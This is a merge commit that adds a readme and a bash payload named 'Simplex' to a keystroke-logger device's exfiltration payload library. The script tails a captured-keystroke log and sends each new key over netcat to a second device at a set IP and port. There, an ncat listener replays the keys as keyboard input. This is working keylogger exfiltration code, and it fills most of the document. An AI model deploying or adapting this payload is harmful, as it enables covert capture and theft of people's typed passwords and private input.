Merge pull request #70 from cribb-it/Simplex

Simplex

payloads/library/exfiltration/Multi_Net_Simplex/readme.md

@@ -0,0 +1,47 @@
+# :phone: Simplex
+- Author: Cribbit
+- Version: 1.0
+- Target: Mutli OS
+- Category: Exfiltration
+- Attackmode: None - Needs wifi connection
+
+## :mag: Match
+croc_send
+croc_listen
+
+## :book: Description
+Sends keystrokes from one croc to another.
+
+This is a PoC basically me playing with netcat. It's quite slow!!
+
+### Listener
+On the listener use ‘croc_listen’ this will set up. This will create a netcat listener on the port and pass the incoming traffic to QUACK KEYCODE.
+
+### Sender
+On the sending croc set the croc2 variable to the IP address of the listener croc i.e. `croc2=192.168.1.100`
+Use ‘croc_send’ this will check the raw log and send new key press over nc to the other croc.
+
+### To stop
+Type `exit` on the attached keyboards.
+
+### Note
+Set the port variable to an unused port i.e. ‘port=8080’
+
+This is a proof of concept. As there are some limitations due to the way the QUACK command works.
+As by default, it releases all key(s) after it send a keycode. 
+So, you may have issues with command like `CTRL + C` it may do:
+```
+CTRL
+CTRL + C
+CTRL
+```
+If you hit CTRL then the C then let go of C then CTRL.
+You could fix this by modifying the QUACK file. If you look for the function `run_ducky_line(context, line, lang_file)`.</br>
+Then look for the line `elif cmd == 'KEYCODE':` then 6'ish line down `hidg_write(elements,release_key)`
+then change `release_key` to `False` or set the `release_key` variable to false `release_key = False` before the hidg_write line.
+
+
+## :placard: Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |

payloads/library/exfiltration/Multi_Net_Simplex/simplex.txt

@@ -0,0 +1,62 @@
+#!/bin/bash
+trap "kill 0" EXIT
+###########################################
+# Title: Simplex
+# Author: Cribbit
+# Description: Send key from one croc to another
+# Target: Multi
+###########################################
+
+MATCH croc_send
+MATCH croc_listen
+
+LED SETUP
+QUACK DELAY 200
+# variables
+croc2=192.168.1.100
+port=8080
+# fixed variables
+charlog=/root/loot/croc_char.log
+rawlog=/root/loot/croc_raw.log
+LED SPECIAL
+# if listener set up netcat
+if [[ "$LOOT" == "croc_listen" ]]; then
+	# Set up a command for nc to send to QUACK.
+	CMD="while true; do read i && QUACK KEYCODE \$i ; done"
+	# set nc to run in its own process
+	ncat -lvnk -p $port -c "$CMD" &
+	# give nc time to start
+	sleep 1
+fi
+
+LED ATTACK
+# get the current line count
+point=$(wc -l "$rawlog" | awk {'print $1'})
+# forever loop
+while :
+do
+	# if sender
+	if [[ "$LOOT" == "croc_send" ]]; then
+		# get the current line count
+		cnt=$(wc -l "$rawlog" | awk {'print $1'})
+		# compaire the first with the secound
+		if [ "$cnt" -ne "$point" ]; then
+			# get the differnce
+			dif=$((cnt-point))
+			while read -r line; do
+				key=${line:0:8}
+				echo $key -n | nc -w 2 $croc2 $port
+			done <<< "$(tail --lines $dif $rawlog)"
+			# reset count
+			point=$cnt
+		fi
+	fi
+	# should we exit
+	if tail -c 6 "$charlog" | grep -q 'exit'; then
+		sleep 1
+		break;
+	fi
+done
+
+LED FINISH
+sleep 1